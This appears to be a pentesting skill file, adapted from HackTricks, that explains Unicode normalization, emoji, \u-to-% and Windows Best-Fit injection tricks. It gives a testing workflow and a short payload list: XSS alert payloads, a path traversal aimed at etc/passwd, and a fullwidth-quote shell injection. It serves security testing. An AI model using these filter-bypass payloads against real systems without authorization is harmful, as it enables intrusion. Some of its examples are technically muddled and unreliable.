Hacktricks-skills unicode-injection-pentest

How to find and exploit Unicode injection vulnerabilities in web applications. Use this skill whenever you're testing for XSS, SQLi, or other injection vulnerabilities and want to try Unicode-based bypass techniques. Trigger this when you encounter input validation, WAF filters, or encoding issues that might be vulnerable to Unicode normalization attacks, emoji injection, or Windows Best-Fit character mapping exploits.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/unicode-injection/unicode-injection/SKILL.MD
source content

Unicode Injection Pentesting

A skill for discovering and exploiting Unicode injection vulnerabilities in web applications.

Overview

Unicode injection vulnerabilities occur when back-end or front-end systems behave unexpectedly when receiving unusual Unicode characters. Attackers can bypass protections and inject arbitrary characters to exploit injection vulnerabilities like XSS or SQLi.

Attack Vectors

1. Unicode Normalization Attacks

When it happens: Systems modify user input after validation (e.g., converting to uppercase/lowercase).

How it works: Unicode characters normalize to ASCII during transformation, generating new characters that bypass filters.

Example:

Input: 㱋 (\u3c4b)
After normalization: <4b
Result: < character injected

Testing approach:

  1. Identify input fields with case conversion or normalization
  2. Send Unicode characters that normalize to dangerous ASCII
  3. Check if the normalized output bypasses filters

2. \u to % Conversion Attacks

When it happens: Backend transforms

\u
prefix to
%
(URL encoding style).

How it works:

\u3c4b
becomes
%3c4b
, which URL-decodes to
<4b
, injecting
<
.

Testing approach:

  1. Find Unicode characters with
    \u
    representation
  2. Send them to the application
  3. Check if the backend converts
    \u
    to
    %
  4. Verify if URL decoding creates injection characters

Useful resources:

3. Emoji Injection Attacks

When it happens: Backends mishandle emoji encoding conversions.

How it works: Encoding mismatches (e.g., Windows-1252 to UTF-8 to ASCII) can normalize emoji to dangerous characters.

Example payload:

💋img src=x onerror=alert(document.domain)//💛

Vulnerable pattern:

$str = htmlspecialchars($_GET["str"]);
$str = iconv("Windows-1252", "UTF-8", $str);
$str = iconv("UTF-8", "ASCII//TRANSLIT", $str);

Testing approach:

  1. Send emoji payloads with embedded injection code
  2. Check for encoding conversion chains
  3. Look for normalization to ASCII characters

Emoji lists:

4. Windows Best-Fit/Worst-Fit Attacks

When it happens: Windows applications use "W" (wide) APIs but call "A" (ANSI) APIs, triggering Best-Fit conversion.

How it works: Windows replaces Unicode characters that can't display in ASCII with similar ASCII characters.

Common mappings:

  • Characters mapped to
    /
    (0x2F) - path traversal
  • Characters mapped to
    \
    (0x5C) - path traversal
  • Fullwidth double quotes (U+FF02) - argument injection

Example:

Input: " (fullwidth double quote U+FF02)
After Best-Fit: " (ASCII double quote)
Result: Shell argument splitting

Testing approach:

  1. Check if target uses Windows with W→A API conversion
  2. Use worst.fit mapping to find character mappings
  3. Send Unicode characters that map to dangerous ASCII
  4. Test blacklist bypasses, path traversal, shell escape bypasses

Testing Workflow

Step 1: Reconnaissance

  1. Identify input vectors: Forms, URL parameters, headers, file uploads
  2. Check for encoding: Look for iconv, htmlspecialchars, case conversion
  3. Determine platform: Windows vs Linux (affects Best-Fit applicability)
  4. Map the data flow: Where does input go? What transformations occur?

Step 2: Initial Testing

  1. Send basic Unicode: Test with common Unicode characters
  2. Check normalization: Look for case conversion or encoding changes
  3. Test emoji: Send emoji payloads with embedded code
  4. Try \u sequences: Send Unicode escape sequences

Step 3: Advanced Testing

  1. Use worst.fit mappings: Find characters that map to dangerous ASCII
  2. Test encoding chains: Multiple conversions can create vulnerabilities
  3. Bypass blacklists: Use Unicode equivalents of blocked characters
  4. Path traversal: Map characters to
    /
    and
    \
  5. Shell injection: Use fullwidth quotes for argument splitting

Step 4: Verification

  1. Check output: Does the injection work?
  2. Review logs: What did the backend receive?
  3. Test impact: Can you execute code, read files, etc.?
  4. Document findings: Save payloads and results

Common Payloads

XSS via Unicode

\u3c4b<script>alert(1)</script>\u3e4b
💋<img src=x onerror=alert(1)>💛

Path Traversal via Best-Fit

/\u2215..\u2215etc\u2215passwd  # Characters mapping to /

Shell Injection via Fullwidth Quotes

"\uff02ls\uff02  # Fullwidth quotes that become ASCII quotes

Tools and Resources

Important Notes

  1. Windows Best-Fit requires W→A API conversion: Not all Windows apps are vulnerable
  2. Encoding matters: UTF-8, Windows-1252, ASCII conversions create different behaviors
  3. Some vulnerabilities won't be fixed: Best-Fit is a Windows feature, not a bug
  4. Test in context: What works depends on the specific application and platform

When to Use This Skill

  • Testing input validation and WAF bypasses
  • Investigating XSS or SQLi that seems filtered
  • Analyzing encoding-related issues
  • Pentesting Windows-based web applications
  • Reviewing applications with Unicode handling
  • When standard injection payloads are blocked

Safety and Ethics

  • Only test systems you have authorization to test
  • Document all findings for remediation
  • Unicode injection can have unintended side effects
  • Some exploits may cause application crashes or data corruption